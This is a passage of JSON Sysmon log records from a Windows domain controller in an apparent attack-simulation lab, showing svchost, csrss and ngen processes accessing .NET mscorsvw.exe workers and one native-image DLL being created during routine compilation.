C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:14.756","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010A6920C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7702,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:15.038\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:15.038","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7703,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:15.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:15.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7704,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:15.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:15.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7705,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:16.006\r\nProcessGuid: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nProcessId: 4588\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11ec-0\\System.Data.Entity.Design.dll\r\nCreationUtcTime: 2020-08-01 08:06:16.006","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:16.006","ProcessGuid":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11ec-0\\System.Data.Entity.Design.dll","CreationUtcTime":"2020-08-01 08:06:16.006","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7706,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:16.069\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-001002B00E00}\r\nTargetProcessId: 2452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:16.069","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-001002B00E00}","TargetProcessId":"2452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7707,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:16.069\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-001002B00E00}\r\nTargetProcessId: 2452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:16.069","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-001002B00E00}","TargetProcessId":"2452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7708,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:16.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-001002B00E00}\r\nTargetProcessId: 2452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:16.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-001002B00E00}","TargetProcessId":"2452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7709,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:16.303\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2262-5F25-0000-001064420E00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:16.303","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2262-5F25-0000-001064420E00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
